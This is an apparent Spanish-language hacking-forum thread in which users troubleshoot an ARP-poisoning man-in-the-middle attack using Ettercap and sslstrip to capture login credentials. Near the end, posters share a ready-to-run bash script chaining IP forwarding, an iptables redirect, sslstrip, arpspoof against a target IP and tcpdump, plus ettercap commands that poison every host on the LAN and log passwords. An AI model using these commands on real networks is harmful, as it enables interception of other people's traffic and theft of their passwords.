Ettercap+Sslstrip

Iniciado por Goshin, 9 Marzo 2010, 21:30 PM

0 Miembros y 3 Visitantes están viendo este tema.

Goshin

Si lo he leido para asegurarme , nose porque no cambia las direcciones MAC hm no tengo ni idea de como solucionarlo.Pongo de paso un enlace donde se explica perfectamente, pero aun asi ami no me funciona el ataque ARP.
http://casidiablo.net/videotutoriales/ettercap.htm?keepThis=true&TB_iframe=true&height=635&width=800

kamsky

pues si es raro si.. no creo que tengas la tabla estática... para asegurarte prueba a cambiarla tu a mano
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Goshin

#12
Podria ser cosa del router ? el Firewall lo he desactivado para hacer pruebas pero nuse voy a mirar lo de la tabla.
Bueno te pego las entradas de mi tabla ARP:

? (192.168.2.10) at 00:1d:e0:8f:XX:XX [ether] PERM on wlan0 ----> (esta estaba añadida que como se ve es la del pc que quiero escanear)
? (192.168.2.1) at 00:22:75:7b:XX:XX [ether] on wlan0 --------->(Esta la he añadadido yo y es la del router)

Goshin

hmm me ha pasado una cosa interesante , he consegido capturar un packete que si me sale en el user messages y es del foro.
HTTP : 66.118.xx.xx:xx -> USER: goshin  PASS:   INFO: http://foro.elhacker.net/login.html

El pass no sale ni en el ettercap, al ver esto me he animado y he empezado a logearme en varios sitios , pero sin ningun resultado la verdad esque me estoy desesperando xDDD

kamsky

o te sale o no te sale, no puede ser que te salgan unas cosas y otras no... :-\

es lógico que bastantes cosas no te salgan ya que serán datos de páginas cifradas, de ahí que te dijese que primero hay que cerciorarse que se hace bien el MiM y luego ya le das caña al SslStrip
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

oleviatan

Ola amigos!!

He estado leyendo este hilo y a mi me ocurre lo mismo que a Goshin. Estoy en la misma situación hago un arp poisoning con un filtro ssh y me sale de vez en cuando en la tabla de mensajes:
DHCP: [192.168.1.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.1.1 DNS 80.58.61.250
DHCP: [192.168.1.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.1.1 DNS 80.58.61.250

Y en las conexiones a veces veo algo leible, pero no paso de ahí.

Si se ha solucionado podrías decirme como

Muchas gracias.

l1vv3r

Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:

#!/bin/bash

path_dir=/tmp #La ruta donde quieras guardar los resultados
file_name=sslstrip.log
file_name2=tcpdump.pcap
device=wlan0 #Modifica según el dispositivo desde donde hagas la captura.
$direccion_ip=192.168.0.12 #La IP del objetivo
$gateway=192.168.0.1 #La IP para realizar el ARP Spoofing

   echo "1" > /proc/sys/net/ipv4/ip_forward
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555
   roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555
   roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway
   roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip

Espero que te sea de utilidad

PyrOS-9889

mejor prueba esto

pero si lo quieres hacer con ettercap puedes probar esto:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
ettercap -TqM arp // // -i eth0
sslstrip -w passwords
tail -f passwords

con esos pasos ahorras hacer 1 al ip_forward y ya no usas arpspoof además envenenas a todos en la LAN xD

algo tarde pero pues a lo mejor a alguien le sirve... :p